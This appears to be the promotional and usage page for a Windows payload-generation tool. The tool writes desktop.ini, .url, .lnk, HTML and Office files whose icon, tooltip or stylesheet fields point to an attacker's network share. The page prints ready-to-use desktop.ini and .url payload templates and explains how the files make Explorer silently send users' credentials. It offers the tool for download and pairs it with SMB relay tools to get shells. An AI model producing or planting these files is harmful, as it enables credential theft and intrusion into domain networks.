Introduction:
Hacking is not always about breaking systems with remote execution vulnerabilities.
This time we are going to use a different approach.
Imagine that you are connected to a domain network and somehow, you are able to
deliver files to the network, for example writing files to a heavily used fileserver,
sending documents by email to network users or executing MITM attacks against HTTP
Trafic. If you are able to do it, then you only need a way to force network computers
to connect to the host of your choice.
Our
Network payload generation provides new ways that you can use to attack
those networks as it is able to deploy several kind of content that will force the
remote computers to connect to the designated target and authenticate themselves
on behalf of the logged user. At that point there are lots of ways to exploit those
systems like sniffing, executing
namedpipes
or the new
smbrelay3.

Our payload generation tool is able to generate and deploy several files like desktop.ini,
lnk files, url files, html/office documents with embedded links to a remote resource.
Those embedded links are automatically handled by Microsoft explorer and there is
no way to disable it.
Details:
The -t parameter specifies what kind of payload is going to be used. Examples:
* d1: Iconfile - desktop.ini: The IconFile parameter points to a network
resource. When you access a filesystem folder and that desktop.ini is stored on
a subfolder, explorer.exe will automatically connect to the network and send user
credentials.
* d2: LocalizedResourceName - desktop.ini: The
LocalizedResourceName
points to a network resource. Works with folder/subfolder
* d3: InfoTip - desktop.ini: The
nInfoTip points to a network resource.
Works when selecting the folder
* d4: desktop.ini - desktop.ini: The
desktop.ini points to a network
resource. Works when entering the folder
* d0: All - desktop.ini: Deploy all desktop.ini known payloads at once to
ensure that the remote target is engaged.
[.ShellClassInfo]
InfoTip=Proof of concept for desktop redirect - http://www.tarasco.org
desktop.ini=@\\host\admin$,-1
InfoTip=@\\host\admin$,-1
LocalizedResourceName=@\\host\admin$,-1
IconFile=\\host\admin$
IconIndex=-666
ConfirmFileOp=0
* u: url file: Deploy a .url file, that works as an lnk file. The target
IconFile= points to a network service.
[DEFAULT]
BASEURL=http://www.tarasco.org
[InternetShortcut]
URL=http://www.tarasco.org
Modified=203BF2701D7FC60120
IconIndex=3
IconFile=\\host\admin$
* l: url file: Deploy a .lnk file. This is a void builtin lnk file that contains
a CUSTOMICON parameter (flag & 128) pointing to a network service.
* h: html file: Deploy a .html file with an
LINK REL="stylesheet"
pointing to a network service .
* o: office file: Deploy a .pps file with a
LINK REL="stylesheet"
html code pointing to a network service. You can rename the file extension to .doc,.ppt,.pps,.xls,..
The
-p parameter is optional and points to the directory where the payload
is going to be saved.
You can use this tool to deploy payloads and attack a network pipe created by the
namedpipes tool or replay SMB or HTTP traffic
to a designated target to get a shell with
smbrelay3.
You can browse online the
source code.
Download (Windows executable + Source code)